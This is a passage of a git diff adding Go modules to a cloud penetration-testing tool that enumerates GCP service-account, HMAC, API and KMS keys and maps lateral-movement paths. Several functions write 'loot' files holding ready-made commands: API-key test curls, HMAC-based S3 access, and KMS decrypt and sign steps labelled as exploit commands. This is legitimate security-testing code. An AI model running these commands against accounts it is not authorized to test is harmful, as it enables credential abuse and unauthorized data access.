time.Now().After(key.ValidBefore) { + expired = true + } + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "SA Key", + KeyID: keyID, + Owner: sa.Email, + DisplayName: sa.DisplayName, + Origin: origin, + Algorithm: key.KeyAlgorithm, + State: state, + CreateTime: key.ValidAfter, + ExpireTime: key.ValidBefore, + Expired: expired, + DWDEnabled: dwdEnabled, + }) + } + } + } + + // 2. Enumerate HMAC Keys + hmacService := hmacservice.New() + hmacKeys, err := hmacService.ListHMACKeys(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate HMAC keys in project %s", projectID)) + } else { + for _, key := range hmacKeys { + origin := "Service Account" + // Note: User HMAC keys are not enumerable via API, so all we see are SA keys + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "HMAC", + KeyID: key.AccessID, + Owner: key.ServiceAccountEmail, + DisplayName: "", + Origin: origin, + State: key.State, + CreateTime: key.TimeCreated, + Expired: false, // HMAC keys don't expire + }) + } + } + + // 3. Enumerate API Keys + apiKeysService := apikeysservice.New() + apiKeys, err := apiKeysService.ListAPIKeysWithKeyStrings(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate API keys in project %s", projectID)) + } else { + for _, key := range apiKeys { + // Extract key ID from full name + keyID := key.UID + if keyID == "" { + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + } + + state := "ACTIVE" + if !key.DeleteTime.IsZero() { + state = "DELETED" + } + + restrictions := "None" + if key.HasRestrictions { + restrictions = key.RestrictionType + if len(key.AllowedAPIs) > 0 { + restrictions = fmt.Sprintf("%s (APIs: %d)", key.RestrictionType, len(key.AllowedAPIs)) + } + } + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "API Key", + KeyID: keyID, + Owner: "Project-level", + DisplayName: key.DisplayName, + Origin: "-", + State: state, + CreateTime: key.CreateTime, + Expired: false, // API keys don't expire + Restrictions: restrictions, + KeyString: key.KeyString, + }) + } + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectKeys[projectID] = projectKeys + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["keys-hmac-s3-commands"] = &internal.LootFile{ + Name: "keys-hmac-s3-commands", + Contents: "# HMAC S3-Compatible Access Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["keys-apikey-test-commands"] = &internal.LootFile{ + Name: "keys-apikey-test-commands", + Contents: "# API Key Test Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["keys-enumeration-commands"] = &internal.LootFile{ + Name: "keys-enumeration-commands", + Contents: "# Key Enumeration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, key := range projectKeys { + m.addKeyToLoot(projectID, key) + } + m.mu.Unlock() +} + +func (m *KeysModule) addKeyToLoot(projectID string, key UnifiedKeyInfo) { + switch key.KeyType { + case "SA Key": + // Add enumeration commands for user-managed SA keys, especially old ones + if key.Origin == "User Managed" { + lootFile := m.LootMap[projectID]["keys-enumeration-commands"] + if lootFile != nil { + age := "-" + ageWarning := "" + if !key.CreateTime.IsZero() { + ageDuration := time.Since(key.CreateTime) + age = formatKeyAge(ageDuration) + days := int(ageDuration.Hours() / 24) + if days >= 365 { + ageWarning = " [OLD KEY - " + age + "]" + } else if days >= 90 { + ageWarning = " [" + age + " old]" + } + } + + lootFile.Contents += fmt.Sprintf( + "# SA Key: %s%s\n"+ + "# Service Account: %s\n"+ + "# Project: %s\n"+ + "# Created: %s (Age: %s)\n"+ + "# Origin: %s\n\n"+ + "# List all keys for this service account:\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n\n"+ + "# Describe specific key:\n"+ + "gcloud iam service-accounts keys get-public-key %s --iam-account=%s --project=%s\n\n", + key.KeyID, + ageWarning, + key.Owner, + key.ProjectID, + key.CreateTime.Format("2006-01-02"), + age, + key.Origin, + key.Owner, + key.ProjectID, + key.KeyID, + key.Owner, + key.ProjectID, + ) + } + } + + case "HMAC": + if key.State == "ACTIVE" { + lootFile := m.LootMap[projectID]["keys-hmac-s3-commands"] + if lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# HMAC Key: %s\n"+ + "# Service Account: %s\n"+ + "# Project: %s\n\n"+ + "# Configure AWS CLI with HMAC credentials:\n"+ + "aws configure set aws_access_key_id %s\n"+ + "aws configure set aws_secret_access_key \n\n"+ + "# List buckets via S3-compatible endpoint:\n"+ + "aws --endpoint-url https://storage.googleapis.com s3 ls\n\n", + key.KeyID, + key.Owner, + key.ProjectID, + key.KeyID, + ) + } + } + + case "API Key": + if key.KeyString != "" { + lootFile := m.LootMap[projectID]["keys-apikey-test-commands"] + if lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# API Key: %s (%s)\n"+ + "# Project: %s\n"+ + "# Restrictions: %s\n\n"+ + "# Test API access:\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://maps.googleapis.com/maps/api/geocode/json?address=test'\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://translation.googleapis.com/language/translate/v2?q=Hello&target=es'\n\n", + key.KeyID, + key.DisplayName, + key.ProjectID, + key.Restrictions, + key.KeyString, + key.KeyString, + ) + } + } + } +} + +func (m *KeysModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getTableHeader returns the header for the keys table +func (m *KeysModule) getTableHeader() []string { + return []string{ + "Project ID", + "Project Name", + "Key Type", + "Key ID", + "Owner", + "Origin", + "Algorithm", + "State", + "Created", + "Expires", + "Age", + "DWD", + "Restrictions", + } +} + +// keysToTableBody converts keys to table body rows +func (m *KeysModule) keysToTableBody(keys []UnifiedKeyInfo) [][]string { + var body [][]string + for _, key := range keys { + created := "-" + if !key.CreateTime.IsZero() { + created = key.CreateTime.Format("2006-01-02") + } + + // Calculate age + age := "-" + if !key.CreateTime.IsZero() { + age = formatKeyAge(time.Since(key.CreateTime)) + } + + expires := "-" + if !key.ExpireTime.IsZero() { + // Check for "never expires" (year 9999) + if key.ExpireTime.Year() >= 9999 { + expires = "Never" + } else { + expires = key.ExpireTime.Format("2006-01-02") + } + } + + dwd := "-" + if key.KeyType == "SA Key" { + if key.DWDEnabled { + dwd = "Yes" + } else { + dwd = "No" + } + } + + restrictions := "-" + if key.KeyType == "API Key" { + restrictions = key.Restrictions + } + + algorithm := key.Algorithm + if algorithm == "" { + algorithm = "-" + } + + body = append(body, []string{ + key.ProjectID, + m.GetProjectName(key.ProjectID), + key.KeyType, + key.KeyID, + key.Owner, + key.Origin, + algorithm, + key.State, + created, + expires, + age, + dwd, + restrictions, + }) + } + return body +} + +// formatKeyAge formats a duration into a human-readable age string +func formatKeyAge(d time.Duration) string { + days := int(d.Hours() / 24) + if days >= 365 { + years := days / 365 + remainingDays := days % 365 + months := remainingDays / 30 + if months > 0 { + return fmt.Sprintf("%dy %dm", years, months) + } + return fmt.Sprintf("%dy", years) + } else if days >= 30 { + months := days / 30 + remainingDays := days % 30 + if remainingDays > 0 { + return fmt.Sprintf("%dm %dd", months, remainingDays) + } + return fmt.Sprintf("%dm", months) + } + return fmt.Sprintf("%dd", days) +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *KeysModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, keys := range m.ProjectKeys { + body := m.keysToTableBody(keys) + tableFiles := []internal.TableFile{{ + Name: "keys", + Header: m.getTableHeader(), + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isEmptyLootFile(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = KeysOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_KEYS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *KeysModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allKeys := m.getAllKeys() + body := m.keysToTableBody(allKeys) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isEmptyLootFile(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{{ + Name: "keys", + Header: m.getTableHeader(), + Body: body, + }} + + output := KeysOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_KEYS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/kms.go b/gcp/commands/kms.go new file mode 100644 index 00000000..af23e7d5 --- /dev/null +++ b/gcp/commands/kms.go @@ -0,0 +1,564 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + KMSService "github.com/BishopFox/cloudfox/gcp/services/kmsService" + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPKMSCommand = &cobra.Command{ + Use: globals.GCP_KMS_MODULE_NAME, + Aliases: []string{"crypto", "encryption-keys"}, + Short: "Enumerate Cloud KMS key rings and crypto keys with security analysis", + Long: `Enumerate Cloud KMS key rings and crypto keys across projects with security-relevant details. + +Features: +- Lists all KMS key rings and crypto keys +- Shows key purpose (encryption, signing, MAC) +- Identifies protection level (software, HSM, external) +- Shows rotation configuration and status +- Detects public key access via IAM +- Generates gcloud commands for key operations + +Security Columns: +- Purpose: ENCRYPT_DECRYPT, ASYMMETRIC_SIGN, ASYMMETRIC_DECRYPT, MAC +- Protection: SOFTWARE, HSM, EXTERNAL, EXTERNAL_VPC +- Rotation: Key rotation period and next rotation time +- PublicDecrypt: Whether allUsers/allAuthenticatedUsers can decrypt + +Resource IAM Columns: +- IAM Binding Role: The IAM role granted ON this key (e.g., roles/cloudkms.cryptoKeyDecrypter) +- IAM Binding Principal: The principal (user/SA/group) who has that role on this key + +Attack Surface: +- Public decrypt access allows unauthorized data access +- Keys without rotation may be compromised long-term +- HSM vs software protection affects key extraction risk +- External keys indicate third-party key management`, + Run: runGCPKMSCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type KMSModule struct { + gcpinternal.BaseGCPModule + + // Per-project data for hierarchical output + ProjectKeyRings map[string][]KMSService.KeyRingInfo + ProjectCryptoKeys map[string][]KMSService.CryptoKeyInfo + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type KMSOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o KMSOutput) TableFiles() []internal.TableFile { return o.Table } +func (o KMSOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPKMSCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_KMS_MODULE_NAME) + if err != nil { + return + } + + module := &KMSModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectKeyRings: make(map[string][]KMSService.KeyRingInfo), + ProjectCryptoKeys: make(map[string][]KMSService.CryptoKeyInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *KMSModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_KMS_MODULE_NAME, m.processProject) + + // Get all data for stats + allKeyRings := m.getAllKeyRings() + allCryptoKeys := m.getAllCryptoKeys() + + if len(allCryptoKeys) == 0 { + logger.InfoM("No KMS keys found", globals.GCP_KMS_MODULE_NAME) + return + } + + // Count security-relevant metrics + hsmCount := 0 + publicDecryptCount := 0 + for _, key := range allCryptoKeys { + if key.ProtectionLevel == "HSM" { + hsmCount++ + } + if key.IsPublicDecrypt { + publicDecryptCount++ + } + } + + msg := fmt.Sprintf("Found %d key ring(s), %d key(s)", len(allKeyRings), len(allCryptoKeys)) + if hsmCount > 0 { + msg += fmt.Sprintf(" [%d HSM]", hsmCount) + } + if publicDecryptCount > 0 { + msg += fmt.Sprintf(" [%d PUBLIC DECRYPT!]", publicDecryptCount) + } + logger.SuccessM(msg, globals.GCP_KMS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllKeyRings returns all key rings from all projects +func (m *KMSModule) getAllKeyRings() []KMSService.KeyRingInfo { + var all []KMSService.KeyRingInfo + for _, keyRings := range m.ProjectKeyRings { + all = append(all, keyRings...) + } + return all +} + +// getAllCryptoKeys returns all crypto keys from all projects +func (m *KMSModule) getAllCryptoKeys() []KMSService.CryptoKeyInfo { + var all []KMSService.CryptoKeyInfo + for _, keys := range m.ProjectCryptoKeys { + all = append(all, keys...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *KMSModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating KMS in project: %s", projectID), globals.GCP_KMS_MODULE_NAME) + } + + ks := KMSService.New() + + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["kms-commands"] = &internal.LootFile{ + Name: "kms-commands", + Contents: "# KMS Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + // Get key rings + keyRings, err := ks.KeyRings(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_KMS_MODULE_NAME, + fmt.Sprintf("Could not enumerate KMS key rings in project %s", projectID)) + return + } + + // Get crypto keys + keys, err := ks.CryptoKeys(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_KMS_MODULE_NAME, + fmt.Sprintf("Could not enumerate KMS keys in project %s", projectID)) + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectKeyRings[projectID] = keyRings + m.ProjectCryptoKeys[projectID] = keys + + for _, key := range keys { + m.addKeyToLoot(projectID, key) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d key ring(s), %d key(s) in project %s", len(keyRings), len(keys), projectID), globals.GCP_KMS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *KMSModule) addKeyToLoot(projectID string, key KMSService.CryptoKeyInfo) { + lootFile := m.LootMap[projectID]["kms-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# KMS KEY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, KeyRing: %s, Location: %s\n"+ + "# Purpose: %s, Protection: %s\n", + key.Name, + key.ProjectID, key.KeyRing, key.Location, + key.Purpose, key.ProtectionLevel, + ) + + // Commands + lootFile.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe key:\n"+ + "gcloud kms keys describe %s --keyring=%s --location=%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud kms keys get-iam-policy %s --keyring=%s --location=%s --project=%s\n"+ + "# List versions:\n"+ + "gcloud kms keys versions list --key=%s --keyring=%s --location=%s --project=%s\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + + // Purpose-specific commands + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + switch key.Purpose { + case "ENCRYPT_DECRYPT": + lootFile.Contents += fmt.Sprintf( + "# Encrypt data:\n"+ + "echo -n 'secret data' | gcloud kms encrypt --key=%s --keyring=%s --location=%s --project=%s --plaintext-file=- --ciphertext-file=encrypted.bin\n"+ + "# Decrypt data:\n"+ + "gcloud kms decrypt --key=%s --keyring=%s --location=%s --project=%s --ciphertext-file=encrypted.bin --plaintext-file=-\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + case "ASYMMETRIC_SIGN": + lootFile.Contents += fmt.Sprintf( + "# Sign data:\n"+ + "gcloud kms asymmetric-sign --key=%s --keyring=%s --location=%s --project=%s --version=1 --digest-algorithm=sha256 --input-file=data.txt --signature-file=signature.bin\n"+ + "# Get public key:\n"+ + "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + case "ASYMMETRIC_DECRYPT": + lootFile.Contents += fmt.Sprintf( + "# Decrypt data:\n"+ + "gcloud kms asymmetric-decrypt --key=%s --keyring=%s --location=%s --project=%s --version=1 --ciphertext-file=encrypted.bin --plaintext-file=-\n"+ + "# Get public key:\n"+ + "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + } + + lootFile.Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getKeysHeader returns the header for the crypto keys table +func (m *KMSModule) getKeysHeader() []string { + return []string{ + "Project", + "Key Name", + "Key Ring", + "Location", + "Purpose", + "Protection", + "Version", + "State", + "Rotation", + "Public Encrypt", + "Public Decrypt", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +// getKeyRingsHeader returns the header for the key rings table +func (m *KMSModule) getKeyRingsHeader() []string { + return []string{ + "Project", + "Key Ring", + "Location", + "Key Count", + } +} + +// keysToTableBody converts crypto keys to table body rows +func (m *KMSModule) keysToTableBody(keys []KMSService.CryptoKeyInfo) [][]string { + var body [][]string + for _, key := range keys { + // Format rotation + rotation := "-" + if key.RotationPeriod != "" { + rotation = formatDuration(key.RotationPeriod) + } + + // Format protection level + protection := key.ProtectionLevel + if protection == "" { + protection = "SOFTWARE" + } + + // If key has IAM bindings, create one row per binding + if len(key.IAMBindings) > 0 { + for _, binding := range key.IAMBindings { + body = append(body, []string{ + m.GetProjectName(key.ProjectID), + key.Name, + key.KeyRing, + key.Location, + formatPurpose(key.Purpose), + protection, + key.PrimaryVersion, + key.PrimaryState, + rotation, + shared.BoolToYesNo(key.IsPublicEncrypt), + shared.BoolToYesNo(key.IsPublicDecrypt), + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row + body = append(body, []string{ + m.GetProjectName(key.ProjectID), + key.Name, + key.KeyRing, + key.Location, + formatPurpose(key.Purpose), + protection, + key.PrimaryVersion, + key.PrimaryState, + rotation, + shared.BoolToYesNo(key.IsPublicEncrypt), + shared.BoolToYesNo(key.IsPublicDecrypt), + "-", + "-", + }) + } + } + return body +} + +// keyRingsToTableBody converts key rings to table body rows +func (m *KMSModule) keyRingsToTableBody(keyRings []KMSService.KeyRingInfo) [][]string { + var body [][]string + for _, kr := range keyRings { + body = append(body, []string{ + m.GetProjectName(kr.ProjectID), + kr.Name, + kr.Location, + fmt.Sprintf("%d", kr.KeyCount), + }) + } + return body +} + +// buildTablesForProject builds table files for a single project +func (m *KMSModule) buildTablesForProject(projectID string) []internal.TableFile { + keys := m.ProjectCryptoKeys[projectID] + keyRings := m.ProjectKeyRings[projectID] + + keysBody := m.keysToTableBody(keys) + keyRingsBody := m.keyRingsToTableBody(keyRings) + + var tableFiles []internal.TableFile + if len(keysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keys", + Header: m.getKeysHeader(), + Body: keysBody, + }) + } + if len(keyRingsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keyrings", + Header: m.getKeyRingsHeader(), + Body: keyRingsBody, + }) + } + return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *KMSModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectCryptoKeys { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectKeyRings { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = KMSOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_KMS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *KMSModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allKeys := m.getAllCryptoKeys() + allKeyRings := m.getAllKeyRings() + + keysBody := m.keysToTableBody(allKeys) + keyRingsBody := m.keyRingsToTableBody(allKeyRings) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // Build table files + var tableFiles []internal.TableFile + if len(keysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keys", + Header: m.getKeysHeader(), + Body: keysBody, + }) + } + if len(keyRingsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keyrings", + Header: m.getKeyRingsHeader(), + Body: keyRingsBody, + }) + } + + output := KMSOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_KMS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatPurpose formats key purpose for display +func formatPurpose(purpose string) string { + switch purpose { + case "ENCRYPT_DECRYPT": + return "Symmetric" + case "ASYMMETRIC_SIGN": + return "Sign" + case "ASYMMETRIC_DECRYPT": + return "Asymm Decrypt" + case "MAC": + return "MAC" + default: + return purpose + } +} + +// formatDuration formats a duration string for display +func formatDuration(duration string) string { + // Duration is in format like "7776000s" (90 days) + duration = strings.TrimSuffix(duration, "s") + if duration == "" { + return "-" + } + + // Parse seconds + var seconds int64 + fmt.Sscanf(duration, "%d", &seconds) + + if seconds == 0 { + return "-" + } + + days := seconds / 86400 + if days > 0 { + return fmt.Sprintf("%dd", days) + } + + hours := seconds / 3600 + if hours > 0 { + return fmt.Sprintf("%dh", hours) + } + + return fmt.Sprintf("%ds", seconds) +} diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go new file mode 100755 index 00000000..e59cb6b2 --- /dev/null +++ b/gcp/commands/lateralmovement.go @@ -0,0 +1,1014 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + CloudRunService "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" + ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" + GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +// Module name constant +const GCP_LATERALMOVEMENT_MODULE_NAME string = "lateral-movement" + +var GCPLateralMovementCommand = &cobra.Command{ + Use: GCP_LATERALMOVEMENT_MODULE_NAME, + Aliases: []string{"lateral", "pivot"}, + Short: "Map lateral movement paths, credential theft vectors, and pivot opportunities", + Long: `Identify lateral movement opportunities within and across GCP projects. + +This module uses FoxMapper graph data for permission-based analysis combined with +direct enumeration of compute resources for token theft vectors. + +Features: +- Maps service account impersonation chains (SA → SA → SA) +- Identifies token creator permissions (lateral movement via impersonation) +- Finds cross-project access paths +- Detects VM metadata abuse vectors +- Analyzes credential storage locations (secrets, environment variables) +- Generates exploitation commands for penetration testing + +Prerequisites: +- Run 'foxmapper gcp graph create' for permission-based analysis + +This module helps identify how an attacker could move laterally after gaining +initial access to a GCP environment.`, + Run: runGCPLateralMovementCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +// LateralMovementPath represents a lateral movement opportunity +type LateralMovementPath struct { + Source string // Starting point (principal or resource) + SourceType string // Type of source (serviceAccount, user, compute_instance, etc.) + Target string // Target resource/identity + Method string // How the lateral movement is achieved + Category string // Category of lateral movement + Permissions []string // Permissions required + Description string // Human-readable description + RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW + ExploitCommand string // Command to exploit + ProjectID string // Project where this path exists +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LateralMovementModule struct { + gcpinternal.BaseGCPModule + + // Paths from enumeration + ProjectPaths map[string][]LateralMovementPath // projectID -> paths + AllPaths []LateralMovementPath // All paths combined + + // FoxMapper findings + FoxMapperFindings []foxmapperservice.LateralFinding // FoxMapper-based findings + FoxMapperCache *gcpinternal.FoxMapperCache + + // OrgCache for ancestry lookups + OrgCache *gcpinternal.OrgCache + + // Loot + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LateralMovementOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LateralMovementOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LateralMovementOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_LATERALMOVEMENT_MODULE_NAME) + if err != nil { + return + } + + module := &LateralMovementModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPaths: make(map[string][]LateralMovementPath), + AllPaths: []LateralMovementPath{}, + FoxMapperFindings: []foxmapperservice.LateralFinding{}, + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Mapping lateral movement paths...", GCP_LATERALMOVEMENT_MODULE_NAME) + + // Load OrgCache for ancestry lookups (needed for per-project filtering) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + diskCache, _, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + m.OrgCache = diskCache + } + } + + // Get FoxMapper cache from context or try to load it + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + // Try to load FoxMapper data (org from hierarchy if available) + 